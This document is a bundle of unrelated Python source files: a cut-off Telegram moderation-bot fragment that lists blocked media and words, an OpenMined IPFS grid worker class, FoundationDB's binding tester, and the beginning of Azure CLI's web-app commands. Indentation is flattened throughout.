reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2R,callback_data=json.dumps(["del{}".format(TY),chatId,userID])),]])
Bot("sendMessage",{"chat_id":chatID,"text":r.DelallR,"reply_to_message_id":message.message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if order == "showBlocklist":
chatId = split[1]
userId = split[2]
TY = split[3]
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatId)
rank = isrank(redis,userId,chatId)
if (rank is not False or rank is not 0 or rank != "vip") and group is True:
redis.hset("{}Nbot:{}:TXreplys".format(BOT_ID,chatID),tx,text)
li = redis.smembers("{}Nbot:{}:{}".format(BOT_ID,chatId,TY))
if li:
i = 1
words = ""
for ID in li:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Blocklistone,callback_data=json.dumps(["delfromb",TY,userID,chatId])),]])
if TY == "blockanimations":
Bot("sendAnimation",{"chat_id":userId,"animation":ID,"reply_markup":reply_markup})
if TY == "blockSTICKERs":
Bot("sendSticker",{"chat_id":userId,"sticker":ID,"reply_markup":reply_markup})
if TY == "blockphotos":
Bot("sendPhoto",{"chat_id":userId,"photo":ID,"reply_markup":reply_markup})
if TY == "blockTEXTs":
words = words+"\n"+str(i)+" - {"+ID+"}"
i += 1
print(len(words))
if len(words) > 3000:
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
words = ''
if TY == "blockTEXTs":
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2,callback_data=json.dumps(["delBL",TY,userID,chatId])),]])
Bot("sendMessage",{"chat_id":userId,"text":r.Delall,"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":reply_markup})
else:
Bot("sendMessage",{"chat_id":userId,"text":r.listempty2,"reply_to_message_id":message.message_id,"parse_mode":"html"})
|
base_worker.py
|
import base64
import json
import random
import time
from threading import Thread
from bitcoin import base58
from ..lib import utils
from ..services.broadcast_known_workers import BroadcastKnownWorkersService
from ..services.whoami import WhoamiService
class GridWorker():
def __init__(self, node_type, email=None, name=None):
self.node_type = node_type
self.api = utils.get_ipfs_api(self.node_type)
self.id = utils.get_id(self.node_type, self.api)
# Maps IDs to objects we don't want to pass around, e.g. torch objects
self.objects = {}
# load email and name
whoami = utils.load_whoami()
if (email is None):
if whoami:
self.email = whoami['email']
else:
self.email = input('Enter your email for payment: ')
else:
self.email = email
if (name is None):
if (whoami):
self.name = whoami['name']
else:
self.name = input('Enter an easy name to remember you by: ')
else:
self.name = name
whoami = {'email': self.email, 'name': self.name}
utils.store_whoami(whoami)
self.subscribed = []
# LAUNCH SERVICES - these are non-blocking and run on their own threads
# all service objects will live in this dictionary
self.services = {}
if node_type != 'client':
# this service serves the purpose of helping other nodes find out
# about nodes on the network.
# if someone queries the "list_worker" channel - it'll send a
# message directly to the querying node with a list of the
# OpenMined nodes of which it is aware.
self.services[
'broadcast_known_workers'] = BroadcastKnownWorkersService(self)
# WHOMAI
self.services['whoami_service'] = WhoamiService(self)
def get_openmined_nodes(self):
"""
This method returns the list of known openmined workers on the newtork.
Note - not all workers are necessarily "compute" workers.
Some may only be anchors and will ignore any jobs you send them.
"""
nodes = self.api.pubsub_peers('openmined')
if (nodes is not None):
return nodes
else:
return []
def get_nodes(self):
nodes = self.api.pubsub_peers()
if (nodes is not None):
return nodes
else:
return []
def publish(self, channel, message):
"""
This method sends a message over an IPFS channel. The number of people
who receive it is purely based on the number of people who happen
to be listening.
"""
if isinstance(message, dict) or isinstance(message, list):
self.api.pubsub_pub(topic=channel, payload=json.dumps(message))
else:
self.api.pubsub_pub(topic=channel, payload=message)
def request_response(self, channel, message, response_handler, timeout=10):
"""
This method makes a request over a channel to a specific node and
will hang until it receives a response from that node. Note that
the channel used for the response is random.
"""
random_channel = self.id + "_" + str(random.randint(0, 1e10))
def timeout_message(seconds):
time.sleep(int(seconds))
self.publish(
channel=random_channel,
message=["timeout after " + str(seconds) + " seconds"])
def send():
self.publish(channel=channel, message=[message, random_channel])
t1 = Thread(target=timeout_message, args={timeout})
t1.start()
response = self.listen_to_channel_sync(random_channel,
response_handler, send)
if (len(response) == 1):
try:
if ('timeout' in response[0]):
raise TimeoutError(response[0])
except RuntimeError:
# response is 1d with length 1
pass
return response
def listen_to_channel_sync(self, *args):
"""
Synchronous version of listen_to_channel
"""
return self.listen_to_channel_impl(*args)
def listen_to_channel(self, *args):
"""
Listens for IPFS pubsub sub messages asynchronously.
This function will create the listener and call back your handler
function on a new thread.
"""
t1 = Thread(target=self.listen_to_channel_impl, args=args)
t1.start()
def listen_to_channel_impl(self,
channel,
handle_message,
init_function=None,
ignore_from_self=False):
"""
Do not call directly. Use listen_to_channel or listen_to_channel_sync instead.
"""
first_proc = True
if channel not in self.subscribed:
new_messages = self.api.pubsub_sub(topic=channel, stream=True)
self.subscribed.append(channel)
else:
return
# new_messages is a generator which will keep yield new messages until
# you return from the loop. If you do return from the loop, we will no
# longer be subscribed.
for m in new_messages:
if init_function is not None and first_proc:
init_function()
first_proc = False
message = self.decode_message(m)
if message is not None:
fr = base58.encode(message['from'])
if not ignore_from_self or fr != self.id:
out = handle_message(message)
if out is not None:
return out
else:
print('ignore mssage from self')
def decode_message(self, encoded):
if ('from' in encoded):
decoded = {}
decoded['from'] = base64.standard_b64decode(encoded['from'])
decoded['data'] = base64.standard_b64decode(
encoded['data']).decode('ascii')
decoded['seqno'] = base64.standard_b64decode(encoded['seqno'])
decoded['topicIDs'] = encoded['topicIDs']
decoded['encoded'] = encoded
return decoded
else:
return None
|
tester.py
|
#!/usr/bin/python
#
# tester.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2018 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import ctypes
import math
import sys
import os
import struct
import threading
import time
import random
import time
import traceback
sys.path[:0] = [os.path.join(os.path.dirname(__file__), '..')]
import fdb
fdb.api_version(int(sys.argv[2]))
from fdb import six
from fdb.impl import strinc
import fdb.tuple
from directory_extension import DirectoryExtension
from cancellation_timeout_tests import test_timeouts
from cancellation_timeout_tests import test_db_timeouts
from cancellation_timeout_tests import test_cancellation
from cancellation_timeout_tests import test_retry_limits
from cancellation_timeout_tests import test_db_retry_limits
from cancellation_timeout_tests import test_combinations
from size_limit_tests import test_size_limit_option
random.seed(0)
if len(sys.argv) == 4:
db = fdb.open(sys.argv[3])
else:
db = fdb.open()
class Stack:
def __init__(self):
self.stack = []
def __repr__(self):
return repr(self.stack)
def __str__(self):
return str(self.stack)
def __len__(self):
return len(self.stack)
def __getitem__(self, idx):
return self.stack[idx]
def __setitem__(self, idx, val):
self.stack[idx] = val
def push(self, idx, val):
self.stack.insert(0, (idx, val))
def pop(self, count=None, with_idx=False):
c = count
if c is None:
c = 1
raw = self.stack[:c]
del self.stack[:c]
for i in range(len(raw)):
if isinstance(raw[i][1], fdb.Future):
try:
val = raw[i][1].wait()
if val is None or (hasattr(val, 'present') and not val.present()):
raw[i] = (raw[i][0], b'RESULT_NOT_PRESENT')
else:
raw[i] = (raw[i][0], val)
except fdb.FDBError as e:
# print('ERROR: %r' % e)
raw[i] = (raw[i][0], fdb.tuple.pack((b'ERROR', str(e.code).encode('ascii'))))
if count is None:
if with_idx:
return raw[0]
else:
return raw[0][1]
else:
if with_idx:
return raw
else:
return [item[1] for item in raw]
class Instruction:
def __init__(self, tr, stack, op, index, isDatabase=False, isSnapshot=False):
self.tr = tr
self.stack = stack
self.op = op
self.index = index
self.isDatabase = isDatabase
self.isSnapshot = isSnapshot
def pop(self, count=None, with_idx=False):
return self.stack.pop(count, with_idx)
def push(self, val):
self.stack.push(self.index, val)
def test_db_options(db):
db.options.set_max_watches(100001)
db.options.set_datacenter_id("dc_id")
db.options.set_machine_id("machine_id")
db.options.set_transaction_timeout(100000)
db.options.set_transaction_timeout(0)
db.options.set_transaction_timeout(0)
db.options.set_transaction_max_retry_delay(100)
db.options.set_transaction_size_limit(100000)
db.options.set_transaction_retry_limit(10)
db.options.set_transaction_retry_limit(-1)
db.options.set_snapshot_ryw_enable()
db.options.set_snapshot_ryw_disable()
@fdb.transactional
def test_options(tr):
tr.options.set_priority_system_immediate()
tr.options.set_priority_batch()
tr.options.set_causal_read_risky()
tr.options.set_causal_write_risky()
tr.options.set_read_your_writes_disable()
tr.options.set_read_system_keys()
tr.options.set_access_system_keys()
tr.options.set_timeout(60 * 1000)
tr.options.set_retry_limit(50)
tr.options.set_max_retry_delay(100)
tr.options.set_used_during_commit_protection_disable()
tr.options.set_debug_transaction_identifier('my_transaction')
tr.options.set_log_transaction()
tr.options.set_read_lock_aware()
tr.options.set_lock_aware()
tr.get(b'\xff').wait()
def check_watches(db, watches, expected):
for i, watch in enumerate(watches):
if watch.is_ready() or expected:
try:
watch.wait()
if not expected:
assert False, "Watch %d is ready" % i
except fdb.FDBError as e:
tr = db.create_transaction()
tr.on_error(e).wait()
return False
return True
def test_watches(db):
while True:
db[b'w0'] = b'0'
db[b'w3'] = b'3'
watches = [None]
@fdb.transactional
def txn1(tr):
watches[0] = tr.watch(b'w0')
tr.set(b'w0', b'0')
assert not watches[0].is_ready()
txn1(db)
watches.append(db.clear_and_watch(b'w1'))
watches.append(db.set_and_watch(b'w2', b'2'))
watches.append(db.get_and_watch(b'w3'))
assert watches[3][0] == b'3'
watches[3] = watches[3][1]
time.sleep(1)
if not check_watches(db, watches, False):
continue
del db[b'w1']
time.sleep(5)
if not check_watches(db, watches, False):
continue
db[b'w0'] = b'a'
db[b'w1'] = b'b'
del db[b'w2']
db.bit_xor(b'w3', b'\xff\xff')
if check_watches(db, watches, True):
return
@fdb.transactional
def test_locality(tr):
tr.options.set_timeout(60 * 1000)
tr.options.set_read_system_keys() # We do this because the last shard (for now, someday the last N shards) is in the /FF/ keyspace
# This isn't strictly transactional, thought we expect it to be given the size of our database
boundary_keys = list(fdb.locality.get_boundary_keys(tr, b'', b'\xff\xff')) + [b'\xff\xff']
end_keys = [tr.get_key(fdb.KeySelector.last_less_than(k)) for k in boundary_keys[1:]]
start_addresses = [fdb.locality.get_addresses_for_key(tr, k) for k in boundary_keys[:-1]]
end_addresses = [fdb.locality.get_addresses_for_key(tr, k) for k in end_keys]
if [set(s.wait()) for s in start_addresses] != [set(e.wait()) for e in end_addresses]:
raise Exception("Locality not internally consistent.")
def test_predicates():
assert fdb.predicates.is_retryable(fdb.FDBError(1020))
assert not fdb.predicates.is_retryable(fdb.FDBError(10))
class Tester:
tr_map = {}
tr_map_lock = threading.RLock()
def __init__(self, db, prefix):
self.db = db
self.instructions = self.db[fdb.tuple.range((prefix,))]
self.stack = Stack()
self.tr_name = prefix
Tester.tr_map[self.tr_name] = None
self.last_version = 0
self.threads = []
self.directory_extension = DirectoryExtension()
def push_range(self, inst, iter, prefix_filter=None):
kvs = []
for k, v in iter:
if prefix_filter is None or k.startswith(prefix_filter):
kvs += [k, v]
inst.push(fdb.tuple.pack(tuple(kvs)))
@staticmethod
@fdb.transactional
def wait_empty(tr, prefix):
res = tr.get_range_startswith(prefix, 1).to_list()
if len(res) == 1:
raise fdb.FDBError(1020)
@fdb.transactional
def log_stack(self, tr, prefix, entries):
for i, (idx, el) in entries.items():
pk = prefix + fdb.tuple.pack((i, idx))
pv = fdb.tuple.pack((el,))
tr.set(pk, pv[:40000])
def current_transaction(self):
with Tester.tr_map_lock:
return Tester.tr_map[self.tr_name]
def new_transaction(self):
with Tester.tr_map_lock:
Tester.tr_map[self.tr_name] = self.db.create_transaction()
def switch_transaction(self, name):
self.tr_name = name
with Tester.tr_map_lock:
if self.tr_name not in Tester.tr_map:
self.new_transaction()
def run(self):
for idx, i in enumerate(self.instructions):
op_tuple = fdb.tuple.unpack(i.value)
op = op_tuple[0]
# print("Stack is %r" % self.stack)
# if op != "PUSH" and op != "SWAP":
# print("%d. Instruction is %s" % (idx, op))
isDatabase = op.endswith(six.u('_DATABASE'))
isSnapshot = op.endswith(six.u('_SNAPSHOT'))
if isDatabase:
op = op[:-9]
obj = self.db
elif isSnapshot:
op = op[:-9]
obj = self.current_transaction().snapshot
else:
obj = self.current_transaction()
inst = Instruction(obj, self.stack, op, idx, isDatabase, isSnapshot)
try:
if inst.op == six.u("PUSH"):
inst.push(op_tuple[1])
elif inst.op == six.u("DUP"):
inst.stack.push(*self.stack[0])
elif inst.op == six.u("EMPTY_STACK"):
self.stack = Stack()
elif inst.op == six.u("SWAP"):
idx = inst.pop()
self.stack[0], self.stack[idx] = self.stack[idx], self.stack[0]
elif inst.op == six.u("POP"):
inst.pop()
elif inst.op == six.u("SUB"):
a, b = inst.pop(2)
inst.push(a - b)
elif inst.op == six.u("CONCAT"):
a, b = inst.pop(2)
inst.push(a + b)
elif inst.op == six.u("WAIT_FUTURE"):
old_idx, item = inst.pop(with_idx=True)
inst.stack.push(old_idx, item)
elif inst.op == six.u("NEW_TRANSACTION"):
self.new_transaction()
elif inst.op == six.u("USE_TRANSACTION"):
self.switch_transaction(inst.pop())
elif inst.op == six.u("ON_ERROR"):
inst.push(inst.tr.on_error(inst.pop()))
elif inst.op == six.u("GET"):
key = inst.pop()
num = random.randint(0, 2)
if num == 0:
f = obj[key]
elif num == 1:
f = obj.get(key)
else:
f = obj.__getitem__(key)
if f == None:
inst.push(b'RESULT_NOT_PRESENT')
else:
inst.push(f)
elif inst.op == six.u("GET_KEY"):
key, or_equal, offset, prefix = inst.pop(4)
result = obj.get_key(fdb.KeySelector(key, or_equal, offset))
if result.startswith(prefix):
inst.push(result)
elif result < prefix:
inst.push(prefix)
else:
inst.push(strinc(prefix))
elif inst.op == six.u("GET_RANGE"):
begin, end, limit, reverse, mode = inst.pop(5)
if limit == 0 and mode == -1 and random.random() < 0.5:
if reverse:
r = obj[begin:end:-1]
else:
r = obj[begin:end]
else:
r = obj.get_range(begin, end, limit, reverse, mode)
self.push_range(inst, r)
elif inst.op == six.u("GET_RANGE_STARTS_WITH"):
prefix, limit, reverse, mode = inst.pop(4)
self.push_range(inst, obj.get_range_startswith(prefix, limit, reverse, mode))
elif inst.op == six.u("GET_RANGE_SELECTOR"):
begin_key, begin_or_equal, begin_offset, end_key, end_or_equal, end_offset, limit, reverse, mode, prefix = inst.pop(10)
beginSel = fdb.KeySelector(begin_key, begin_or_equal, begin_offset)
endSel = fdb.KeySelector(end_key, end_or_equal, end_offset)
if limit == 0 and mode == -1 and random.random() < 0.5:
if reverse:
r = obj[beginSel:endSel:-1]
else:
r = obj[beginSel:endSel]
else:
r = obj.get_range(beginSel, endSel, limit, reverse, mode)
self.push_range(inst, r, prefix_filter=prefix)
elif inst.op == six.u("GET_READ_VERSION"):
self.last_version = obj.get_read_version().wait()
inst.push(b"GOT_READ_VERSION")
elif inst.op == six.u("SET"):
key, value = inst.pop(2)
if random.random() < 0.5:
obj[key] = value
else:
obj.set(key, value)
if obj == self.db:
inst.push(b"RESULT_NOT_PRESENT")
elif inst.op == six.u("LOG_STACK"):
prefix = inst.pop()
entries = {}
while len(self.stack) > 0:
stack_index = len(self.stack) - 1
entries[stack_index] = inst.pop(with_idx=True)
if len(entries) == 100:
self.log_stack(self.db, prefix, entries)
entries = {}
self.log_stack(self.db, prefix, entries)
elif inst.op == six.u("ATOMIC_OP"):
opType, key, value = inst.pop(3)
getattr(obj, opType.lower())(key, value)
if obj == self.db:
inst.push(b"RESULT_NOT_PRESENT")
elif inst.op == six.u("SET_READ_VERSION"):
inst.tr.set_read_version(self.last_version)
elif inst.op == six.u("CLEAR"):
if random.random() < 0.5:
del obj[inst.pop()]
else:
obj.clear(inst.pop())
if obj == self.db:
inst.push(b"RESULT_NOT_PRESENT")
elif inst.op == six.u("CLEAR_RANGE"):
begin, end = inst.pop(2)
num = random.randint(0, 2)
if num == 0:
del obj[begin:end]
elif num == 1:
obj.clear_range(begin, end)
else:
obj.__delitem__(slice(begin, end))
if obj == self.db:
inst.push(b"RESULT_NOT_PRESENT")
elif inst.op == six.u("CLEAR_RANGE_STARTS_WITH"):
obj.clear_range_startswith(inst.pop())
if obj == self.db:
inst.push(b"RESULT_NOT_PRESENT")
elif inst.op == six.u("READ_CONFLICT_RANGE"):
inst.tr.add_read_conflict_range(inst.pop(), inst.pop())
inst.push(b"SET_CONFLICT_RANGE")
elif inst.op == six.u("WRITE_CONFLICT_RANGE"):
inst.tr.add_write_conflict_range(inst.pop(), inst.pop())
inst.push(b"SET_CONFLICT_RANGE")
elif inst.op == six.u("READ_CONFLICT_KEY"):
inst.tr.add_read_conflict_key(inst.pop())
inst.push(b"SET_CONFLICT_KEY")
elif inst.op == six.u("WRITE_CONFLICT_KEY"):
inst.tr.add_write_conflict_key(inst.pop())
inst.push(b"SET_CONFLICT_KEY")
elif inst.op == six.u("DISABLE_WRITE_CONFLICT"):
inst.tr.options.set_next_write_no_write_conflict_range()
elif inst.op == six.u("COMMIT"):
inst.push(inst.tr.commit())
elif inst.op == six.u("RESET"):
inst.tr.reset()
elif inst.op == six.u("CANCEL"):
inst.tr.cancel()
elif inst.op == six.u("GET_COMMITTED_VERSION"):
self.last_version = inst.tr.get_committed_version()
inst.push(b"GOT_COMMITTED_VERSION")
elif inst.op == six.u("GET_VERSIONSTAMP"):
inst.push(inst.tr.get_versionstamp())
elif inst.op == six.u("TUPLE_PACK"):
count = inst.pop()
items = inst.pop(count)
inst.push(fdb.tuple.pack(tuple(items)))
elif inst.op == six.u("TUPLE_PACK_WITH_VERSIONSTAMP"):
prefix = inst.pop()
count = inst.pop()
items = inst.pop(count)
if not fdb.tuple.has_incomplete_versionstamp(items) and random.random() < 0.5:
inst.push(b"ERROR: NONE")
else:
try:
packed = fdb.tuple.pack_with_versionstamp(tuple(items), prefix=prefix)
inst.push(b"OK")
inst.push(packed)
except ValueError as e:
if str(e).startswith("No incomplete"):
inst.push(b"ERROR: NONE")
else:
inst.push(b"ERROR: MULTIPLE")
elif inst.op == six.u("TUPLE_UNPACK"):
for i in fdb.tuple.unpack(inst.pop()):
inst.push(fdb.tuple.pack((i,)))
elif inst.op == six.u("TUPLE_SORT"):
count = inst.pop()
items = inst.pop(count)
unpacked = map(fdb.tuple.unpack, items)
if six.PY3:
sorted_items = sorted(unpacked, key=fdb.tuple.pack)
else:
sorted_items = sorted(unpacked, cmp=fdb.tuple.compare)
for item in sorted_items:
inst.push(fdb.tuple.pack(item))
elif inst.op == six.u("TUPLE_RANGE"):
count = inst.pop()
items = inst.pop(count)
r = fdb.tuple.range(tuple(items))
inst.push(r.start)
inst.push(r.stop)
elif inst.op == six.u("ENCODE_FLOAT"):
f_bytes = inst.pop()
f = struct.unpack(">f", f_bytes)[0]
if not math.isnan(f) and not math.isinf(f) and not f == -0.0 and f == int(f):
f = int(f)
inst.push(fdb.tuple.SingleFloat(f))
elif inst.op == six.u("ENCODE_DOUBLE"):
d_bytes = inst.pop()
d = struct.unpack(">d", d_bytes)[0]
inst.push(d)
elif inst.op == six.u("DECODE_FLOAT"):
f = inst.pop()
f_bytes = struct.pack(">f", f.value)
inst.push(f_bytes)
elif inst.op == six.u("DECODE_DOUBLE"):
d = inst.pop()
d_bytes = struct.pack(">d", d)
inst.push(d_bytes)
elif inst.op == six.u("START_THREAD"):
t = Tester(self.db, inst.pop())
thr = threading.Thread(target=t.run)
thr.start()
self.threads.append(thr)
elif inst.op == six.u("WAIT_EMPTY"):
prefix = inst.pop()
Tester.wait_empty(self.db, prefix)
inst.push(b"WAITED_FOR_EMPTY")
elif inst.op == six.u("UNIT_TESTS"):
try:
db.options.set_location_cache_size(100001)
test_db_options(db)
test_options(db)
test_watches(db)
test_cancellation(db)
test_retry_limits(db)
test_db_retry_limits(db)
test_timeouts(db)
test_db_timeouts(db)
test_combinations(db)
test_locality(db)
test_predicates()
test_size_limit_option(db)
except fdb.FDBError as e:
print("Unit tests failed: %s" % e.description)
traceback.print_exc()
raise Exception("Unit tests failed: %s" % e.description)
elif inst.op.startswith(six.u('DIRECTORY_')):
self.directory_extension.process_instruction(inst)
else:
raise Exception("Unknown op %s" % inst.op)
except fdb.FDBError as e:
# print('ERROR: %r' % e)
inst.stack.push(idx, fdb.tuple.pack((b"ERROR", str(e.code).encode('ascii'))))
# print(" to %s" % self.stack)
# print()
[thr.join() for thr in self.threads]
if __name__ == '__main__':
t = Tester(db, sys.argv[1].encode('ascii'))
t.run()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.storage.blob import BlockBlobService, BlobPermissions
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.commands.client_factory import UA_AGENT
from azure.cli.core.profiles import ResourceType
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, does_app_already_exist, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (FUNCTIONS_VERSION_TO_DEFAULT_RUNTIME_VERSION, FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION,
FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS, NODE_VERSION_DEFAULT)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = NODE_VERSION_DEFAULT
location = plan_info.location
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
